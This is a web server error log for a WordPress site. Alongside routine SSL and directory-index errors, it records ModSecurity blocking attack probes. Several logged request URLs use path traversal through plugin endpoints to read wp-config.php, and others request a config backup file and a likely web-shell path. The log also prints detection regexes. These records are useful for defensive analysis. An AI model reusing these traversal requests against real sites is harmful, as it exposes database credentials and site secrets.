/home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Fri Nov 24 03:26:19.118028 2023] [ssl:warn] [pid 24486:tid 139686860552064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 24 03:26:31.344440 2023] [ssl:warn] [pid 24488:tid 139686860552064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 24 03:26:31.724470 2023] [ssl:warn] [pid 24488:tid 139686860552064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 24 03:26:33.229378 2023] [ssl:warn] [pid 24488:tid 139686860552064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 24 03:26:35.493157 2023] [ssl:warn] [pid 24903:tid 139779031115648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 24 03:26:47.697005 2023] [ssl:warn] [pid 24906:tid 139779031115648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 24 09:23:58.381263 2023] [autoindex:error] [pid 25506:tid 139778720765696] [client 108.167.189.48:60694] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Fri Nov 24 10:55:05.311233 2023] [ssl:warn] [pid 24906:tid 139779031115648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 24 22:09:40.115803 2023] [autoindex:error] [pid 6270:tid 139778653624064] [client 192.185.179.149:47154] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Fri Nov 24 23:19:16.056723 2023] [ssl:warn] [pid 24906:tid 139779031115648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 25 03:24:19.301062 2023] [ssl:warn] [pid 20292:tid 139646353373056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 25 03:24:27.487677 2023] [ssl:warn] [pid 20299:tid 139646353373056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 25 03:24:27.843506 2023] [ssl:warn] [pid 20299:tid 139646353373056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 25 03:24:29.713407 2023] [ssl:warn] [pid 20299:tid 139646353373056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 25 03:24:31.959238 2023] [ssl:warn] [pid 20753:tid 140298284414848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 25 03:24:40.136984 2023] [ssl:warn] [pid 20756:tid 140298284414848] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 25 14:49:52.511362 2023] [autoindex:error] [pid 20777:tid 140297832941312] [client 192.185.2.123:40832] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Sun Nov 26 00:49:47.539740 2023] [autoindex:error] [pid 20778:tid 140297841334016] [client 93.188.2.5:50444] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/midnight/index.php [Sun Nov 26 00:49:50.272957 2023] [autoindex:error] [pid 20778:tid 140297883297536] [client 93.188.2.5:50462] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/midnight/index.php [Sun Nov 26 03:42:28.034407 2023] [ssl:warn] [pid 4668:tid 140690378835840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 26 03:42:36.328993 2023] [ssl:warn] [pid 4670:tid 140690378835840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 26 03:42:36.871670 2023] [ssl:warn] [pid 4670:tid 140690378835840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 26 03:42:38.585254 2023] [ssl:warn] [pid 4670:tid 140690378835840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 26 03:42:40.838205 2023] [ssl:warn] [pid 5116:tid 139936065922944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 26 03:42:45.055305 2023] [ssl:warn] [pid 5118:tid 139936065922944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 26 10:56:22.398229 2023] [:error] [pid 5140:tid 139935780685568] [client 45.13.227.201:34096] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Nov 26 10:56:22.534339 2023] [:error] [pid 5139:tid 139935747114752] [client 45.13.227.201:34098] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Nov 26 19:03:31.449416 2023] [ssl:warn] [pid 5118:tid 139936065922944] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 27 03:21:06.948411 2023] [ssl:warn] [pid 16674:tid 140328260548480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 27 03:21:19.145450 2023] [ssl:warn] [pid 16681:tid 140328260548480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 27 03:21:19.568005 2023] [ssl:warn] [pid 16681:tid 140328260548480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 27 03:21:21.572247 2023] [ssl:warn] [pid 16681:tid 140328260548480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 27 03:21:23.889071 2023] [ssl:warn] [pid 17095:tid 139904714135424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 27 03:21:32.078963 2023] [ssl:warn] [pid 17096:tid 139904714135424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 27 16:16:04.289886 2023] [autoindex:error] [pid 17322:tid 139904373737216] [client 20.235.242.100:48018] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Nov 27 20:15:02.520254 2023] [autoindex:error] [pid 17322:tid 139904256239360] [client 195.191.148.19:53534] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Nov 28 03:50:24.561546 2023] [ssl:warn] [pid 28046:tid 139840430159744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 28 03:50:32.758869 2023] [ssl:warn] [pid 28048:tid 139840430159744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 28 03:50:33.295745 2023] [ssl:warn] [pid 28048:tid 139840430159744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 28 03:50:35.212961 2023] [ssl:warn] [pid 28048:tid 139840430159744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 28 03:50:37.478850 2023] [ssl:warn] [pid 28462:tid 140541240715136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 28 03:50:45.663792 2023] [ssl:warn] [pid 28463:tid 140541240715136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 28 06:34:44.593376 2023] [autoindex:error] [pid 28482:tid 140541057971968] [client 158.69.23.79:37434] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentytwenty/inc/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 28 18:25:08.229546 2023] [:error] [pid 28482:tid 140541049579264] [client 2.58.56.43:55132] [client 2.58.56.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWZ21J76YRlv11opbRirxQAAAIE"] [Wed Nov 29 03:14:24.406020 2023] [ssl:warn] [pid 9492:tid 140704545634176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 29 03:14:36.593257 2023] [ssl:warn] [pid 9495:tid 140704545634176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 29 03:14:36.954753 2023] [ssl:warn] [pid 9495:tid 140704545634176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 29 03:14:38.850242 2023] [ssl:warn] [pid 9495:tid 140704545634176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 29 03:14:41.108366 2023] [ssl:warn] [pid 9914:tid 140287499589504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 29 03:14:53.290561 2023] [ssl:warn] [pid 9921:tid 140287499589504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 29 03:52:11.125350 2023] [:error] [pid 9940:tid 140287087163136] [client 185.220.101.43:38682] [client 185.220.101.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWb7u1O_3wulk6Xr38GAPAAAAFM"] [Wed Nov 29 05:40:42.424055 2023] [:error] [pid 9940:tid 140287316846336] [client 179.43.159.201:40808] [client 179.43.159.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWcVKlO_3wulk6Xr38GAugAAAEA"] [Wed Nov 29 14:39:48.980866 2023] [ssl:warn] [pid 9921:tid 140287499589504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 29 17:15:23.276516 2023] [:error] [pid 5550:tid 140287095555840] [client 192.42.116.181:59594] [client 192.42.116.181] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWe3-6kk3j29rrqQM1ivDwAAAJI"] [Thu Nov 30 03:19:30.765595 2023] [ssl:warn] [pid 13826:tid 139638140299136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 30 03:19:34.959658 2023] [ssl:warn] [pid 13828:tid 139638140299136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 30 03:19:35.316755 2023] [ssl:warn] [pid 13828:tid 139638140299136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 30 03:19:37.051488 2023] [ssl:warn] [pid 13828:tid 139638140299136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 30 03:19:39.316932 2023] [ssl:warn] [pid 14244:tid 140209165481856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 30 03:19:47.510236 2023] [ssl:warn] [pid 14247:tid 140209165481856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 30 03:32:20.864107 2023] [:error] [pid 14889:tid 140208982738688] [client 185.129.62.63:42882] [client 185.129.62.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWhIlAh2CnLiZ19RhZn-ugAAAMA"] [Thu Nov 30 05:10:22.799330 2023] [:error] [pid 14264:tid 140208762726144] [client 45.141.215.114:44754] [client 45.141.215.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWhfjghnGBG5uq-2zy6z5gAAABI"] [Thu Nov 30 16:43:21.077778 2023] [:error] [pid 14264:tid 140208762726144] [client 185.220.102.253:58990] [client 185.220.102.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWkB-QhnGBG5uq-2zy61uAAAABI"] [Thu Nov 30 21:47:00.993412 2023] [autoindex:error] [pid 14264:tid 140208863438592] [client 45.13.227.201:37114] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Dec 01 03:21:18.918862 2023] [ssl:warn] [pid 32552:tid 140665164633984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 01 03:21:23.128032 2023] [ssl:warn] [pid 32553:tid 140665164633984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 01 03:21:23.501521 2023] [ssl:warn] [pid 32553:tid 140665164633984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 01 03:21:25.145360 2023] [ssl:warn] [pid 32553:tid 140665164633984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 01 03:21:27.430191 2023] [ssl:warn] [pid 508:tid 140370451883904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 01 03:21:35.754158 2023] [ssl:warn] [pid 512:tid 140370451883904] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 01 09:11:09.150107 2023] [ssl:warn] [pid 7964:tid 140445660948352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 01 09:11:17.353017 2023] [ssl:warn] [pid 8010:tid 140445660948352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 01 09:14:39.634738 2023] [ssl:warn] [pid 8782:tid 140433939548032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 01 09:14:47.823350 2023] [ssl:warn] [pid 8799:tid 140433939548032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Dec 01 17:26:12.631487 2023] [:error] [pid 8898:tid 140433594205952] [client 192.42.116.191:57320] [client 192.42.116.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZWpdhBRTlALFtaI0rHQJtQAAAMs"] [Sat Dec 02 03:16:22.261439 2023] [ssl:warn] [pid 23373:tid 140296894756736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 02 03:16:30.466291 2023] [ssl:warn] [pid 23377:tid 140296894756736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 02 03:16:30.849396 2023] [ssl:warn] [pid 23377:tid 140296894756736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 02 03:16:32.760573 2023] [ssl:warn] [pid 23377:tid 140296894756736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 02 03:16:35.025395 2023] [ssl:warn] [pid 23850:tid 140216206276480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 02 03:16:43.207243 2023] [ssl:warn] [pid 23854:tid 140216206276480] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Dec 02 03:26:18.535254 2023] [:error] [pid 23871:tid 140215998355200] [client 37.139.53.67:40368] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZWrqKjTw0SF51YqyrqOd3AAAAAM"] [Sat Dec 02 03:26:23.158690 2023] [:error] [pid 23873:tid 140215859513088] [client 37.139.53.67:40386] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin.php"] [unique_id "ZWrqLyUYSj4DVa63o8QDoQAAAEs"] [Sat Dec 02 03:26:25.103116 2023] [:error] [pid 23873:tid 140215909869312] [client 37.139.53.67:40394] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZWrqMSUYSj4DVa63o8QDowAAAEU"] [Sat Dec 02 03:26:58.793238 2023] [:error] [pid 23874:tid 140215825942272] [client 37.139.53.67:40486] [client 37.139.53.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] 